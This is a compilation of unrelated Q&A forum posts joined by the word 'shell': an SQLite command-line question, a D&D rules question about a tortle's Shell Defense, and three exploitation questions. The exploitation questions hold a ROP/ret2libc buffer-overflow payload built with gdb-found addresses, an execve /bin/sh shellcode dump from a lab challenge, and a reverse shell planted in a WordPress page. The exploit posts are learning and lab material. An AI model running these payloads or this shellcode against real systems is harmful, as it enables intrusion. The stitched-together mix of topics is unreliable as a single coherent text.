SQLite command line shell stuck on …> , CTRL+D not working

I’ve just started learning Databases, and the instructor is teaching SQLite with the command line shell. I downloaded sqlite-tools-win32-x86-3350400.zip from sqlite.org/download

When I enter false commands, like the first two you can see, I get the correct error messages. But when I enter a syntax error: ("Steve, 87654) for example, it’s stuck on …> waiting for more input.
After searching on the internet, users suggested the solution "CTRL+D", but it doesn’t work for me. CTRL+C however just exits sqlite3.

My question: How do I get out of …> to continue with my commands? Why CTRL+D doesn’t work for me, to get out of the …> because of the syntax error or other possible causes? How do I fix my problem?

C:\Users\myUser>sqlite3 test.db SQLite version 3.35.4 2021-04-02 15:20:15 Enter ".help" for usage hints. sqlite> SELECT * FROM contacts; Tim|654321|tim@email.com Brian|1234|brian@mygmail.com sqlite> INSERT INTO contacts VALUES("Steve", 87654); Error: table contacts has 3 columns but 2 values were supplied sqlite> INSERT INTO contacts VALUES(Steve, 87654); Error: no such column: Steve sqlite> INSERT INTO contacts VALUES("Steve, 87654);  // Intentional for demonstration //    ...> ^D  // Entered CTRL+D //    ...> ;    ...>     // Entered CTRL+C // Error: unrecognized token: ""Steve, 87654)"  C:\Users\myUser> 

How does a Cloak of Displacement interact with a tortle’s Shell Defense?

The cloak has a property that causes creatures to have disadvantage on attack rolls against the one wearing it, and

This property is suppressed while you are incapacitated, restrained, or otherwise unable to move (DMG, pg 158).

The way Shell Defense is described

You can withdraw into your shell as an action… While in your shell, you are prone, your speed is 0 and can’t increase, you have disadvantage on Dexterity saving throws, you can’t take reactions, and the only action you can take is a bonus action to emerge from your shell (EGW, pg 181).

is effectively the same as being both incapacitated and restrained, with the only notable difference being that an attack against a prone creature

has advantage if the attacker is within 5 feet of the creature. Otherwise, the attack roll has disadvantage (PHB, pg 292).

While extremely similar mechanically, the tortle using Shell Defense is technically neither restrained nor incapacitated. Furthermore, the ability to emerge from its shell as a bonus action implies the capacity to then move during that turn if the tortle chooses to, so neither are they otherwise unable to move.

As such, would the Cloak of Displacement work for a tortle using Shell Defense (and thus cancel out the advantage melee attackers would normally have due to the prone condition)?

RAW and RAI interpretations are both desired.

ROP execute a shell with execl() – /bin/sh: 0: Can’t open

A vulnerable C program to stack buffer overflow, requires 112 byte stuffing to get to return address of the calling function. Here the Strcpy() is the vulnerable function.

void f(char *name){   char buf[100];   strcpy(buf, name); }  void main(int argc, char *argv[]){   f(argv[1]); }  

Trying to write the rop gadgets to execute a /bin/sh shell by means of execl(). The exploit would be:

python -c 'print 112*"\x90" + "addr. execl()" + "addr. exit()" + "addr. /bin/sh" + "addr. /bin/sh"'   

From gdb these are the found addresses (ASLR disabled for test):

(gdb) print execl       $  1 =  0xb7eb7b60 <__GI_execl> (gdb) print exit       $  2 =  0xb7e359e0 <__GI_exit>  (gdb) info proc map  ...(output omitted) (gdb) find 0xb7e07000,0xb7fbb000,"/bin/sh"       0xb7f62b0b       1 pattern found. (gdb) x/s 0xb7f62b0b       0xb7f62b0b:   "/bin/sh"  (gdb) run $  (python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')       Starting program: /home/marco/asm/execve/bypass_aslr/rop/prove/main $  (python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')       process 3161 is executing new program: /bin/dash       /bin/sh: 0: Can't open UWVS��������       [Inferior 1 (process 3161) exited with code 0177] 

The same test using system() gives the shell.

I don’t understand if the execl() is successful and if it’s replacing the currently running process image.

Platform: Ubuntu 16.04 – 32 bit.

UPDATE: I added some gadgets to the exploit, and got back another result. In brief i added gets() to write the NULL byte as the third argument to pass to execl(). The exploit will write the stack in this order:

addr. exit() fake byte (NULL will be written here)   addr. /bin/sh addr. /bin/sh addr. pop\pop\pop\ret addr. execl() addr. where to write NULL byte addr. pop\ret addr. gets()        <-- ESP will be here when is time to return to caller             112 NOP 

from gdb i run the exploit, i type "new line" so gets() writes NULL to the provided address, and the result is:

[Inferior 1 (process 2793) exited normally] 

This time no errors, but again no shell.

EDIT2: this is the stack after gets() is executed and before execl().

The commands under gdb i used to take the stack layer:

(gdb) b 10     --> this is to stop after strcpy() in the .c code   Breakpoint 1 at 0x8048497: file main.c, line 10.  (gdb) run $  (python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')    Starting program: /home/marco/rop/main $  (python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')   Breakpoint 1, func (name=0xb7e2d06e <__ctype_get_mb_cur_max+30> "X3U0327") at main.c:10   (gdb) b *execl   Breakpoint 2 at 0xb7eb9a80: file execl.c, line 31.   (gdb) c   Continuing.    Breakpoint 2, __GI_execl (path=0xb7f64a0b "/bin/sh", arg=0xb7f64a0b "/bin/sh") at execl.c:31   31    execl.c: File o directory non esistente.   (gdb) x/x $  esp   0xbffff5ec:   0xb7ef334f   (gdb) x/x $  esp+4   0xbffff5f0:   0xb7f64a0b   (gdb) x/x $  esp+8   0xbffff5f4:   0xb7f64a0b   (gdb) x/4x $  esp+12   0xbffff5f8:   0x00    0x42    0x42    0x42   (gdb) x/s $  esp+12   0xbffff5f8:   "" 

Please note, this test was executed from another Ubuntu 16.04, and the addresses are now:

"\xe0\x83\xe6\xb7" +   -> gets() "\x6e\xd0\xe2\xb7" +   -> pop/ret "\xf8\xf5\xff\xbf" +   -> address where to write NULL "\x80\x9a\xeb\xb7" +   -> execl() "\x4f\x33\xef\xb7" +   -> pop/pop/pop/ret "\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh   "\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh "\x42\x42\x42\x42" +   -> fake address to be overwritten "\xd0\x79\xe3\xb7"     -> exit() 

Reverse shell from behind NAT and Firewall

I am new here so I apologize for not providing complete details. Let me explain you the problem now. I was working on Ganana 1 CTF challenge. To up the challenge, I decided to place this CTF machine behind a router. My entire LAB is on Vmware. For this scenario, I used three virtual machines : Kali, Ipfire and Ganana 1 CTF machine.

Kali Linux is my attacker machine which received its IP from VMWARE NAT (192.168.44.5).

Ipfire is installed as a router cum firewall with RED + GREEN configuration. The RED (external) interface received its IP address (192.168.44.3) from Vmware NAT and for the GREEN interface IPfire acts as a DHCP server (192.168.33.1).

Now, I connected Ganana CTF machine to the GREEN interface of the IPfire. It’s IP address is 192.168.33.11.

The GREEN interface is allowed to have internet. Now, when I port scanned the Ganana CTF machine from my kali, port 80can be accessed. As part of the challenge, I got access to the wordpress installation on the target machine. It is here I decided to edit 404.php page to change the code to that of php reverse shell by pentest monkey. I configured it to connect to my attacker machines’ IP address (192.168.44.5) port 1234. But the reverse shell is not working. However, when kali and Ganana 1 are placed on the same network (NAT) the shell is working.

What is the mistake I am making?

Reverse shell from behind firewall and NAT

I have been working on a cyber security project in which I placed a web server behind ipfire router ( external IP 192.168.44.3). This is part of a GREEN LAN network (say IP IS 192.168.33.11). I am trying to get a reverse shell from this target web server to my attacker machine kali (ip 192.168.44.5). CAN somebody help me in detail as how to get this reverse shell successfully?

Exploit education stack-five: trouble opening shell

Im trying the phoenix vm, challenge stack-five on exploit.education (http://exploit.education/phoenix/stack-five/). I run onto a problem while exploiting a stack overflow. The challenge is run execve(‘/bin/sh’) through shellcode. I grabbed the shellcode from shellstorm (http://shell-storm.org/shellcode/files/shellcode-603.php). The shellcode consists of:

[NOP slide] (debug int3 \xcc) "\x48\x31\xd2"                                  // xor    %rdx, %rdx "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov  $  0x68732f6e69622f2f, %rbx "\x48\xc1\xeb\x08"                              // shr    $  0x8, %rbx "\x53"                                          // push   %rbx "\x48\x89\xe7"                                  // mov    %rsp, %rdi "\x50"                                          // push   %rax "\x57"                                          // push   %rdi "\x48\x89\xe6"                                  // mov    %rsp, %rsi "\xb0\x3b"                                      // mov    $  0x3b, %al "\x0f\x05";                                     // syscall (debug int3 \xcc) [padding] [override rip pointing to the middle of the NOP slide] 

I have tested int3’s before and after the shellcode and all seems fine, they both trigger outside and inside gdb and therefore I infer that the shellcode is being executed but i cannot get the shell open.

I’m using this commands:

cat | /opt/phoenix/amd64/stack-five < exploit 
cat exploit - | /opt/phoenix/amd64/stack-five 

Neither of them gets the shell.

Example of execution

user@phoenix-amd64:~$   cat exploit - | /opt/phoenix/amd64/stack-five cat exploit - | /opt/phoenix/amd64/stack-five Welcome to phoenix/stack-five, brought to you by https://exploit.education [ 7018.986649] traps: stack-five[433] trap int3 ip:7fffffffe68e sp:7fffffffe6c8 error:0 whoami Trace/breakpoint trap 

This int3 is AFTER the shellcode.

Some idea of what’s wrong?